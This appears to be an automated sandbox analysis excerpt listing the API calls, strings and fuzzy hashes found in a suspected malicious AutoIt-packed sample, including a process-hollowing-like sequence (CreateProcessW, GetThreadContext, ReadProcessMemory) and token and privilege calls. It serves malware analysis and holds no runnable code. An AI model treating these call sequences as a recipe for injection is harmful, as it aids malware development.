                                      • Opcode Fuzzy Hash: 316d346fac7616a18aaacd0fc3a10fc7ad3d532c3c8fa40c0505db6a2f4ef1c4
                                      • Instruction Fuzzy Hash: 3F71BDB4901A018ECB94DF7EA945679BEE0BBB934571C812ED00BC7272EBB44448EF4D
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004C85CC,?,00558CC8,0000000C), ref: 004C8704
                                      • GetLastError.KERNEL32(?,004C85CC,?,00558CC8,0000000C), ref: 004C870E
                                      • __dosmaperr.LIBCMT ref: 004C8739
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                      • String ID:
                                      • API String ID: 490808831-0
                                      • Opcode ID: 6db83b0ed6e1b76269a8a955266b35f25fc5ecc84b898fd7c170a2ebd4311f08
                                      • Instruction ID: aba6f7bf1acc646ceeae7d5cf408209b700675095e318ade2b8c20243667b66c
                                      • Opcode Fuzzy Hash: 6db83b0ed6e1b76269a8a955266b35f25fc5ecc84b898fd7c170a2ebd4311f08
                                      • Instruction Fuzzy Hash: 4E014C3A70516026C2E462345845F6F67554BA2778F35021FE8048B2E3DDAC9C82815C
                                      APIs
                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00502CD4,?,?,?,00000004,00000001), ref: 00502FF2
                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00502CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00503006
                                      • CloseHandle.KERNEL32(00000000,?,00502CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0050300D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      APIs
                                      • __Init_thread_footer.LIBCMT ref: 004A17F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Init_thread_footer
                                      • String ID: CALL
                                      • API String ID: 1385522511-4196123274
                                      APIs
                                      • _wcslen.LIBCMT ref: 00506F6B
                                        • Part of subcall function 00494ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: LibraryLoad_wcslen
                                      • String ID: >>>AUTOIT SCRIPT<<<
                                      • API String ID: 3312870042-2806939583
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID: EA06
                                      • API String ID: 2638373210-3962188686
                                      APIs
                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00493908
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 036D1A5B
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036D1AF1
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036D1B13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      APIs
                                        • Part of subcall function 00494E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E9C
                                        • Part of subcall function 00494E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00494EAE
                                        • Part of subcall function 00494E90: FreeLibrary.KERNEL32(00000000,?,?,00494EDD,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EC0
                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494EFD
                                        • Part of subcall function 00494E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E62
                                        • Part of subcall function 00494E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00494E74
                                        • Part of subcall function 00494E59: FreeLibrary.KERNEL32(00000000,?,?,004D3CDE,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494E87
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: Library$Load$AddressFreeProc
                                      • String ID:
                                      • API String ID: 2632591731-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      APIs
                                        • Part of subcall function 004C4C7D: RtlAllocateHeap.NTDLL(00000008,00491129,00000000,?,004C2E29,00000001,00000364,?,?,?,004BF2DE,004C3863,00561444,?,004AFDF5,?), ref: 004C4CBE
                                      • _free.LIBCMT ref: 004C506C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID:
                                      • API String ID: 176396367-0
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000008,00491129,00000000,?,004C2E29,00000001,00000364,?,?,?,004BF2DE,004C3863,00561444,?,004AFDF5,?), ref: 004C4CBE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      APIs
                                      • RtlAllocateHeap.NTDLL(00000000,?,00561444,?,004AFDF5,?,?,0049A976,00000010,00561440,004913FC,?,004913C6,?,00491129), ref: 004C3852
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Similarity
                                      • API ID: AllocateHeap
                                      • String ID:
                                      • API String ID: 1279760036-0
                                      APIs
                                      • _free.LIBCMT ref: 004C4D9C
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ErrorFreeHeapLast_free
                                      • String ID:
                                      • API String ID: 1353095263-0
                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                      • Instruction ID: 5adcd4db172a95bbcc5f66dd95d65cc2a7950faeeee045080d9cb43cb33ed0c9
                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                      • Instruction Fuzzy Hash: 1EE0927A2003059F87A0DF6DD500A82B7F4EF84325720852EE89ED3310D331E812CB80
                                      APIs
                                      • FreeLibrary.KERNEL32(?,?,00561418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00494F6D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: FreeLibrary
                                      • String ID:
                                      • API String ID: 3664257935-0
                                      • Opcode ID: bfa6a5f2e11222d55d149c25fe0736e9d1097c441317fe262859802546e0212b
                                      • Instruction ID: 082054b0c189a3e52fef61c95441818a853ad4e99b7052b4481aef015260b567
                                      • Opcode Fuzzy Hash: bfa6a5f2e11222d55d149c25fe0736e9d1097c441317fe262859802546e0212b
                                      • Instruction Fuzzy Hash: E6F08570005302CFCB348F20D490C22BBE0AF943293208A7FE1EA82621C739984ADB18
                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00492DC4
                                        • Part of subcall function 00496B57: _wcslen.LIBCMT ref: 00496B6A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: LongNamePath_wcslen
                                      • String ID:
                                      • API String ID: 541455249-0
                                      • Opcode ID: a0ae4d247acbace673d29f9db3706db273ed2ee86cdcfa9c309a4b5b136b72cf
                                      • Instruction ID: a8d0bc8b4dd24354d791598cafc6daaef51d58879c2216667a725935fdcb944f
                                      • Opcode Fuzzy Hash: a0ae4d247acbace673d29f9db3706db273ed2ee86cdcfa9c309a4b5b136b72cf
                                      • Instruction Fuzzy Hash: 74E0CD766001245BCB209399DC05FDA77DDDFC8794F050076FD09D7258D964AD848554
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: __fread_nolock
                                      • String ID:
                                      • API String ID: 2638373210-0
                                      • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                      • Instruction ID: 627555fb68e07ed76298df8be05460e1d7a8e25ea73d8bc78ba1bd4218dc4716
                                      • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                      • Instruction Fuzzy Hash: 8DE048B0609B005FDF395A28A8517F677D49F49300F10045EF59F83352E57378458A5D
                                      APIs
                                        • Part of subcall function 00493837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00493908
                                        • Part of subcall function 0049D730: GetInputState.USER32 ref: 0049D807
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00492B6B
                                        • Part of subcall function 004930F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0049314E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                      • String ID:
                                      • API String ID: 3667716007-0
                                      • Opcode ID: 968434d5664ae1f4ea695216ce124a40236c26e0bd0593102b45152ca11022b6
                                      • Instruction ID: 2e4032457cc0383957ca104569a8b06a3669494405d534ebe809be8f69c5d129
                                      • Opcode Fuzzy Hash: 968434d5664ae1f4ea695216ce124a40236c26e0bd0593102b45152ca11022b6
                                      • Instruction Fuzzy Hash: E7E0862170424416CE08FF77985297DAF999FE235BF44193FF14683163DE6C4949425A
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,00000000,?,004D0704,?,?,00000000,?,004D0704,00000000,0000000C), ref: 004D03B7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 370dbd1fb616da8c54f6cfa2a345645e2bbfa08984b4dc31e192f022d95789a1
                                      • Instruction ID: 12e9e627dc02a9f0e88d7e3a6b6e8fdbba2f5a83cff4534098ce44b378e09bba
                                      • Opcode Fuzzy Hash: 370dbd1fb616da8c54f6cfa2a345645e2bbfa08984b4dc31e192f022d95789a1
                                      • Instruction Fuzzy Hash: 3ED06C3204010DBBDF128F84DD06EDA3FAAFB48714F014000BE1856021C732E832EB90
                                      APIs
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00491CBC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: InfoParametersSystem
                                      • String ID:
                                      • API String ID: 3098949447-0
                                      • Opcode ID: c99551f4fecfa118b884fc34059494e8dd05d285ddbe36c617ab3a964bc8c80f
                                      • Instruction ID: 999342a89f901d50de607e4029d1972fd164dea8fc3f440cf2cff64ad3c0d0e5
                                      • Opcode Fuzzy Hash: c99551f4fecfa118b884fc34059494e8dd05d285ddbe36c617ab3a964bc8c80f
                                      • Instruction Fuzzy Hash: 45C09B353807049FF2244784FC4AF147754A779B01F044401F60A5A5E3C3E15414FA54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 4c0cf9d94d0b2fc4ecb3083b99d385d2648edacdfe7b5cb0f109cbcbb0abaf10
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 14311674A00109DBD719CF99D48096AF7A2FF6A310B2482A6E80ACF751D739EDC5CBC5
                                      APIs
                                      • Sleep.KERNELBASE(000001F4), ref: 036D22B1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2377113128.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_36d0000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction ID: 8f920473b3f4568dbfdb06a18c1db687a9ad0c7fc9eb0af7c05ac9c9688d77bb
                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                      • Instruction Fuzzy Hash: 3FE0E67494010EDFDB00EFB8D54969E7FB4EF04701F1005A1FD01D2280D6309D509A72
                                      APIs
                                        • Part of subcall function 004A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004A9BB2
                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0052961A
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0052965B
                                      • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0052969F
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005296C9
                                      • SendMessageW.USER32 ref: 005296F2
                                      • GetKeyState.USER32(00000011), ref: 0052978B
                                      • GetKeyState.USER32(00000009), ref: 00529798
                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 005297AE
                                      • GetKeyState.USER32(00000010), ref: 005297B8
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 005297E9
                                      • SendMessageW.USER32 ref: 00529810
                                      • SendMessageW.USER32(?,00001030,?,00527E95), ref: 00529918
                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0052992E
                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00529941
                                      • SetCapture.USER32(?), ref: 0052994A
                                      • ClientToScreen.USER32(?,?), ref: 005299AF
                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 005299BC
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005299D6
                                      • ReleaseCapture.USER32 ref: 005299E1
                                      • GetCursorPos.USER32(?), ref: 00529A19
                                      • ScreenToClient.USER32(?,?), ref: 00529A26
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00529A80
                                      • SendMessageW.USER32 ref: 00529AAE
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00529AEB
                                      • SendMessageW.USER32 ref: 00529B1A
                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00529B3B
                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00529B4A
                                      • GetCursorPos.USER32(?), ref: 00529B68
                                      • ScreenToClient.USER32(?,?), ref: 00529B75
                                      • GetParent.USER32(?), ref: 00529B93
                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 00529BFA
                                      • SendMessageW.USER32 ref: 00529C2B
                                      • ClientToScreen.USER32(?,?), ref: 00529C84
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00529CB4
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00529CDE
                                      • SendMessageW.USER32 ref: 00529D01
                                      • ClientToScreen.USER32(?,?), ref: 00529D4E
                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00529D82
                                        • Part of subcall function 004A9944: GetWindowLongW.USER32(?,000000EB), ref: 004A9952
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00529E05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                      • String ID: @GUI_DRAGID$F$p#V
                                      • API String ID: 3429851547-1761702220
                                      • Opcode ID: d95eff1fffcb29b97756760fc35e19cdbdc9f5fe891db73abe13410078cc8fc6
                                      • Instruction ID: 17478ccb20702ea431b85f11fbef4919a098ebfd0afb518cad7a3014c33e8179
                                      • Opcode Fuzzy Hash: d95eff1fffcb29b97756760fc35e19cdbdc9f5fe891db73abe13410078cc8fc6
                                      • Instruction Fuzzy Hash: 62428A34204211AFDB24CF28DC84AAABFE9FF5A310F140A1DF6998B3E1D771A855DB51
                                      APIs
                                      • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 005248F3
                                      • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00524908
                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00524927
                                      • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0052494B
                                      • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0052495C
                                      • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0052497B
                                      • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 005249AE
                                      • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 005249D4
                                      • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00524A0F
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00524A56
                                      • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00524A7E
                                      • IsMenu.USER32(?), ref: 00524A97
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00524AF2
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00524B20
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00524B94
                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00524BE3
                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00524C82
                                      • wsprintfW.USER32 ref: 00524CAE
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00524CC9
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00524CF1
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00524D13
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00524D33
                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00524D5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                      • String ID: %d/%02d/%02d
                                      • API String ID: 4054740463-328681919
                                      • Opcode ID: ab1fc72d690b7525c4de3b94c7dc3b3e96f9f0484268113496d48bbd263f576b
                                      • Instruction ID: bc473f75d56b16583aea334a11022b8028791a7c87c102dde44a47dff2443cb5
                                      • Opcode Fuzzy Hash: ab1fc72d690b7525c4de3b94c7dc3b3e96f9f0484268113496d48bbd263f576b
                                      • Instruction Fuzzy Hash: 8012DE71600224ABEB248F28EC49FAF7FE8BF86714F104529F915EA2E2D7749945CF50
                                      APIs
                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 004AF998
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004EF474
                                      • IsIconic.USER32(00000000), ref: 004EF47D
                                      • ShowWindow.USER32(00000000,00000009), ref: 004EF48A
                                      • SetForegroundWindow.USER32(00000000), ref: 004EF494
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004EF4AA
                                      • GetCurrentThreadId.KERNEL32 ref: 004EF4B1
                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004EF4BD
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 004EF4CE
                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 004EF4D6
                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 004EF4DE
                                      • SetForegroundWindow.USER32(00000000), ref: 004EF4E1
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF4F6
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF501
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF50B
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF510
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF519
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF51E
                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004EF528
                                      • keybd_event.USER32(00000012,00000000), ref: 004EF52D
                                      • SetForegroundWindow.USER32(00000000), ref: 004EF530
                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 004EF557
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 4125248594-2988720461
                                      • Opcode ID: 9f97d60c19178b955f4824e1a39f81fdf471a54b5a4163b0383adb622aac9807
                                      • Instruction ID: ff5200d94a319fa59d0cac329a6662d7e021a152bfe6c174277c0762131145da
                                      • Opcode Fuzzy Hash: 9f97d60c19178b955f4824e1a39f81fdf471a54b5a4163b0383adb622aac9807
                                      • Instruction Fuzzy Hash: E831B871B402187BEB306BB64C49FBF7E6CEF55B51F100026F601E61D2C6B49D05ABA5
                                      APIs
                                        • Part of subcall function 004F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004F170D
                                        • Part of subcall function 004F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004F173A
                                        • Part of subcall function 004F16C3: GetLastError.KERNEL32 ref: 004F174A
                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 004F1286
                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004F12A8
                                      • CloseHandle.KERNEL32(?), ref: 004F12B9
                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004F12D1
                                      • GetProcessWindowStation.USER32 ref: 004F12EA
                                      • SetProcessWindowStation.USER32(00000000), ref: 004F12F4
                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004F1310
                                        • Part of subcall function 004F10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004F11FC), ref: 004F10D4
                                        • Part of subcall function 004F10BF: CloseHandle.KERNEL32(?,?,004F11FC), ref: 004F10E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                       • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                      • String ID: $default$winsta0$ZU
                                      • API String ID: 22674027-3905663719
                                      • Opcode ID: 023b51691c7a5bfeb28dc7deea0fda940510b06cc5c6d8745ef2e4a46d328126
                                      • Instruction ID: 74b79e3387d346777b453eaf25f3a8a6ae9f74a411fa2986bf88be3cf59f5d5b
                                      • Opcode Fuzzy Hash: 023b51691c7a5bfeb28dc7deea0fda940510b06cc5c6d8745ef2e4a46d328126
                                      • Instruction Fuzzy Hash: BC819C71900208EBDF209FA4CC49FFF7BB9EF45704F14412AFA11A62A1D7389949CB68
                                      APIs
